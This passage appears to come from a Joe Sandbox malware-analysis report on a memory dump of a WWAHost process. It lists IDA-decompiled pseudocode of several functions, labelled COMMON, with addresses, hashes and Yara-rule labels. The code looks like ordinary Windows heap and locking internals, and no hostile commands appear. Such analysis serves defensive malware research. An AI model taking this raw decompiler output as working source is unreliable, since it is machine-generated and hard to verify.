						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03A28D34(_v8, _t80);
					}
					E03972280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0396FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03A28833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0396FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0399B180();
						if(_a4 != 0) {
							E03972280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0397BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0397BB2D(_t16, _t15);
						E0397B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0396FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0396FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0396FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                              0x0397c18d
                                              0x0397c18f
                                              0x0397c191
                                              0x0397c19b
                                              0x0397c1a0
                                              0x0397c1d4
                                              0x0397c1de
                                              0x039c2d6e
                                              0x0397c1e4
                                              0x0397c1e4
                                              0x0397c1e4
                                              0x0397c1ec
                                              0x039c2d7d
                                              0x039c2d7d
                                              0x0397c1f3
                                              0x0397c1ff
                                              0x039c2d88
                                              0x039c2d8d
                                              0x039c2d94
                                              0x039c2d94
                                              0x039c2d9f
                                              0x039c2da4
                                              0x039c2dab
                                              0x039c2db0
                                              0x039c2db2
                                              0x039c2db3
                                              0x039c2db4
                                              0x039c2dbc
                                              0x039c2dc3
                                              0x039c2dc3
                                              0x0397c205
                                              0x0397c205
                                              0x0397c208
                                              0x0397c20e
                                              0x0397c211
                                              0x0397c216
                                              0x0397c219
                                              0x0397c21f
                                              0x0397c222
                                              0x0397c22c
                                              0x0397c234
                                              0x0397c23a
                                              0x0397c23f
                                              0x0397c245
                                              0x0397c24b
                                              0x0397c251
                                              0x0397c25a
                                              0x0397c276
                                              0x0397c27d
                                              0x0397c27d
                                              0x0397c25c
                                              0x0397c25c
                                              0x00000000
                                              0x0397c25e
                                              0x0397c1a4
                                              0x0397c1aa
                                              0x0397c1b3
                                              0x0397c265
                                              0x0397c26c
                                              0x0397c26c
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                              • Instruction ID: dc2e3251fc30ab3b299de85c58887e0b19c38905c0f3c237ac62f701666d3e0f
                                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                              • Instruction Fuzzy Hash: A6313C76701686BED704EBB4D490BEAFB5CBF82244F08456AD41C5B381DB38A945CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039D7016 Relevance: .1, Instructions: 104COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 76%
                                              			E039D7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x3a4d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E039D6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E039D6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03977D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03999AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E0399B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03974620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                              0x039d7016
                                              0x039d701e
                                              0x039d702b
                                              0x039d7033
                                              0x039d7037
                                              0x039d703c
                                              0x039d703e
                                              0x039d7041
                                              0x039d7045
                                              0x039d704a
                                              0x039d7050
                                              0x039d7055
                                              0x039d705a
                                              0x039d7062
                                              0x039d7062
                                              0x039d705a
                                              0x039d7064
                                              0x039d7064
                                              0x039d7067
                                              0x039d7071
                                              0x039d7096
                                              0x039d709b
                                              0x039d70a2
                                              0x039d70a6
                                              0x039d70a7
                                              0x039d70ad
                                              0x039d70b3
                                              0x039d70b6
                                              0x039d70bb
                                              0x039d70c3
                                              0x039d70c3
                                              0x039d70c6
                                              0x039d70cd
                                              0x039d70dd
                                              0x039d70e0
                                              0x039d70e2
                                              0x039d70e2
                                              0x039d70ee
                                              0x039d7101
                                              0x039d70f0
                                              0x039d70f9
                                              0x039d70f9
                                              0x039d710a
                                              0x039d710e
                                              0x039d7112
                                              0x039d7117
                                              0x039d7118
                                              0x039d7118
                                              0x039d70bb
                                              0x039d711d
                                              0x039d7123
                                              0x039d7131
                                              0x039d7131
                                              0x039d7136
                                              0x039d713d
                                              0x039d713e
                                              0x039d713f
                                              0x039d714a
                                              0x039d714a
                                              0x039d7084
                                              0x039d7088
                                              0x00000000
                                              0x039d708e
                                              0x039d708e
                                              0x039d7092
                                              0x00000000
                                              0x039d7092

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 26680469786ec93d72413127b0874a5803a4e981555311d06941077a0ce43cf2
                                              • Instruction ID: fe41617ef6252542d886db55d5939c8319719afccfbf0ba51ae9c7448a3337fc
                                              • Opcode Fuzzy Hash: 26680469786ec93d72413127b0874a5803a4e981555311d06941077a0ce43cf2
                                              • Instruction Fuzzy Hash: BD31A6766047519BC320DFA8C941A7BB7E9FFC8740F088A29F8958B690E730E904C7A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398A70E Relevance: .1, Instructions: 96COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E0398A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x3a47b10; // 0x9
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x3a47b10 = 8;
					 *0x3a47b14 = 0x3a47b0c;
					 *0x3a47b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0xa
					E0398A990(0x3a47b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0398A840(__edx, __ecx, __ecx, _t52, 0x3a47b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x3a47b10; // 0x9
					_t3 = _t37 + 0x27; // 0x30
					__eflags = _t3 >> 5 -  *0x3a47b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x3a47b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x30
						_v8 = _t4 >> 5;
						_t50 = L03974620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x3a47b18 = _v8;
						_t8 = _t52 + 7; // 0x10
						E0399F3E0(_t50,  *0x3a47b14, _t8 >> 3);
						_t28 =  *0x3a47b14; // 0x77577b0c
						__eflags = _t28 - 0x3a47b0c;
						if(_t28 != 0x3a47b0c) {
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x11
						 *0x3a47b14 = _t50;
						_t48 = _v12;
						 *0x3a47b10 = _t9;
						goto L6;
					}
					 *0x3a47b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                              0x0398a713
                                              0x0398a714
                                              0x0398a717
                                              0x0398a71d
                                              0x0398a720
                                              0x0398a722
                                              0x0398a727
                                              0x0398a74a
                                              0x0398a754
                                              0x0398a75e
                                              0x0398a768
                                              0x0398a76a
                                              0x0398a773
                                              0x0398a78b
                                              0x0398a790
                                              0x0398a792
                                              0x0398a741
                                              0x0398a741
                                              0x0398a743
                                              0x0398a749
                                              0x0398a749
                                              0x0398a732
                                              0x0398a73a
                                              0x0398a797
                                              0x0398a79d
                                              0x0398a7a3
                                              0x0398a7a9
                                              0x0398a7b6
                                              0x0398a7bc
                                              0x0398a7ca
                                              0x0398a7e0
                                              0x0398a7e2
                                              0x0398a7e4
                                              0x039c9bf2
                                              0x00000000
                                              0x039c9bf2
                                              0x0398a7ed
                                              0x0398a7f2
                                              0x0398a800
                                              0x0398a805
                                              0x0398a80d
                                              0x0398a812
                                              0x039c9c08
                                              0x039c9c08
                                              0x0398a818
                                              0x0398a81b
                                              0x0398a821
                                              0x0398a824
                                              0x00000000
                                              0x0398a824
                                              0x0398a7ae
                                              0x00000000
                                              0x0398a7ae
                                              0x0398a73c
                                              0x0398a73e
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 165b74e1cfce56ba194ff6404100bac1e7580a5c1d61f9c4fb6c47321d69fbb5
                                              • Instruction ID: e117b78cb3cf543aa21cfb6dbf4ab2a8702c042812b9b941c688fcf77c1ddf0e
                                              • Opcode Fuzzy Hash: 165b74e1cfce56ba194ff6404100bac1e7580a5c1d61f9c4fb6c47321d69fbb5
                                              • Instruction Fuzzy Hash: 6231CEB9A00680AFC711EF08D880F29B7F9FBC4790F144D5AE0268B244D373A903CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0395AA16 Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 95%
                                              			E0395AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x3a4d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x3a47b9c; // 0x0
					_t53 = L03974620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0399B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0399F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L03966C59(_t53, _t51, _t58) != 0) {
							_t28 = E03985E50(0x393c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0398B230(_v32, _v28, 0x393c2d8, 1,  &_v24);
								_t28 = E0395F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                              0x0395aa25
                                              0x0395aa29
                                              0x0395aa2d
                                              0x0395aa30
                                              0x0395aa37
                                              0x0395aa3c
                                              0x039b4458
                                              0x039b4458
                                              0x039b4472
                                              0x039b4474
                                              0x039b4476
                                              0x0395aa64
                                              0x0395aa74
                                              0x039b447c
                                              0x039b4483
                                              0x039b4492
                                              0x0395aa52
                                              0x0395aa54
                                              0x0395aa5e
                                              0x039b44a8
                                              0x039b44ad
                                              0x039b44af
                                              0x039b44b6
                                              0x039b44b6
                                              0x039b44b9
                                              0x039b44bc
                                              0x039b44cd
                                              0x039b44d3
                                              0x039b44d6
                                              0x039b44e1
                                              0x039b44e1
                                              0x039b44e6
                                              0x039b44e8
                                              0x039b44fb
                                              0x039b44fb
                                              0x039b44e8
                                              0x00000000
                                              0x0395aa5e
                                              0x039b4476
                                              0x0395aa42
                                              0x0395aa46
                                              0x0395aa48
                                              0x0395aa4c
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e6d82f59eaa7e294366abbae5d6704c73e15124d2e17562d6aa5cf95fd3d2a2d
                                              • Instruction ID: 10003f16dc47fdad7946271eaade171a88759a0ba521ef6116d4676c10d5bd0a
                                              • Opcode Fuzzy Hash: e6d82f59eaa7e294366abbae5d6704c73e15124d2e17562d6aa5cf95fd3d2a2d
                                              • Instruction Fuzzy Hash: F03105B1A00219AFDF11EF69CD41ABFB3B9EF84700F040469F901EB150E7349951DBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039861A0 Relevance: .1, Instructions: 93COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 97%
                                              			E039861A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E03985E50(0x39367cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E03A29D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0395F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                              0x039861b3
                                              0x039861b5
                                              0x039861bd
                                              0x039861c3
                                              0x039861c7
                                              0x039861d2
                                              0x039861ff
                                              0x039861ff
                                              0x03986201
                                              0x03986207
                                              0x03986207
                                              0x039861d4
                                              0x039861d9
                                              0x00000000
                                              0x00000000
                                              0x039861df
                                              0x039861e2
                                              0x00000000
                                              0x00000000
                                              0x039861e6
                                              0x039861e8
                                              0x039861ee
                                              0x039861ee
                                              0x039861f9
                                              0x039c762f
                                              0x039c7632
                                              0x039c7635
                                              0x039c7639
                                              0x039c7640
                                              0x039c766e
                                              0x039c7675
                                              0x00000000
                                              0x00000000
                                              0x039c7681
                                              0x039c7689
                                              0x039c768d
                                              0x039c7691
                                              0x039c7695
                                              0x039c7699
                                              0x039c76af
                                              0x039c76b5
                                              0x039c76b7
                                              0x039c76b7
                                              0x039c76d7
                                              0x039c76dc
                                              0x00000000
                                              0x039c76dc
                                              0x039c76a2
                                              0x039c76a9
                                              0x039c7651
                                              0x039c7653
                                              0x039c7653
                                              0x039c7656
                                              0x039c7656
                                              0x00000000
                                              0x039c7656
                                              0x039c7644
                                              0x039c7646
                                              0x039c7648
                                              0x039c7648
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b4d68f71f3e01f129d86d7a37b464decabda44215d6a4e68283d7c2c9e1d68c8
                                              • Instruction ID: d1ccff3a92ec8a4968c528416dae9d4f30655e3e3c12a28bb8c1c09e101a6b46
                                              • Opcode Fuzzy Hash: b4d68f71f3e01f129d86d7a37b464decabda44215d6a4e68283d7c2c9e1d68c8
                                              • Instruction Fuzzy Hash: 7F316B726157418FD360EF5DC940B26F7E8FB88B40F09496DE9949B352D770E804CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03994A2C Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E03994A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x3a4d360 ^ _t62;
				_v8 =  *0x3a4d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E03972280(_t26, 0x3a48608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0396FFB0(_t41, _t51, 0x3a48608);
						L2:
						 *0x3a4b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0399B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E03972280(_t28, 0x3a48608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0396FFB0(_t42, _t53, 0x3a48608);
							if(_t53 != 0) {
								L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0396FFB0(_t41, _t51, 0x3a48608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                              0x03994a2c
                                              0x03994a34
                                              0x03994a3c
                                              0x03994a3e
                                              0x03994a48
                                              0x03994a4b
                                              0x03994a4d
                                              0x03994a51
                                              0x03994a9c
                                              0x00000000
                                              0x00000000
                                              0x03994aa3
                                              0x03994aa8
                                              0x03994aad
                                              0x03994ab1
                                              0x03994ade
                                              0x03994ae3
                                              0x03994a5a
                                              0x03994a62
                                              0x03994a6a
                                              0x03994a6e
                                              0x039cf203
                                              0x03994a84
                                              0x03994a88
                                              0x03994a89
                                              0x03994a8a
                                              0x03994a95
                                              0x03994a95
                                              0x03994a79
                                              0x03994a80
                                              0x03994af2
                                              0x03994af4
                                              0x03994af9
                                              0x03994aff
                                              0x03994b01
                                              0x03994b03
                                              0x03994b08
                                              0x039cf20a
                                              0x039cf212
                                              0x039cf216
                                              0x039cf216
                                              0x03994b08
                                              0x03994b13
                                              0x03994b1a
                                              0x039cf229
                                              0x039cf229
                                              0x03994b1a
                                              0x03994a82
                                              0x00000000
                                              0x03994a82
                                              0x03994ab7
                                              0x03994acd
                                              0x03994acd
                                              0x03994ad5
                                              0x03994ada
                                              0x00000000
                                              0x03994ada
                                              0x03994ac2
                                              0x03994acb
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03994acb
                                              0x03994a53
                                              0x03994a53
                                              0x03994a58
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5e5cd1301ed3b2cd10d335491722ae015b77a438647e2784f6487ce9d64207f0
                                              • Instruction ID: e88c45d31756486d40a85bf14d0e12cae7f9088f67e627ef6a6d85e707f71c0a
                                              • Opcode Fuzzy Hash: 5e5cd1301ed3b2cd10d335491722ae015b77a438647e2784f6487ce9d64207f0
                                              • Instruction Fuzzy Hash: 2C3104362023549FEB22DF5DC941B2AFBADFFC1750F44496AE4560B241C774D802CB86
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03998EC7 Relevance: .1, Instructions: 92COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 93%
                                              			E03998EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x3a4d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E03984E70(0x3a486e4, 0x3999490, 0, 0);
					if( *0x3a453e8 > 5 && E03998F33(0x3a453e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
